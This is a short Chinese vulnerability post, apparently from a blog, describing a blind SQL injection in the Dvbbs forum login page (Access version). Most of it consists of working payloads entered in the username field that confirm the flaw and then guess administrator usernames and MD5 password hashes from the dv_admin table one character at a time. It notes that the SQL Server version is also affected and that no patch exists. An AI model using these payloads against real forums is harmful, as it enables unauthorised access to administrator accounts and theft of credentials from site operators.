新博:3abc.blogbus.com

漏洞利用：(access版)
由于使用验证码，该漏洞只能纯手工进行注入尝试，在用户登陆页面，用户名处构造sql语句
如：
判断
Where' and '1'='1

where' and '1'='2
密码任意6位，输入验证码，根据返回信息，第一条显示用户名或密码错误第二条显示无此用户，猜解用户
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
………………………
猜解密码(md5加密)
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
……………………
……………………
…………………..
简单测试官方sql版也存在漏洞，利用过程不写了

相关信息：
Dvbbs官方 http://www.dvbbs.net
补丁：
目前官方没有任何补丁，请等待升级补丁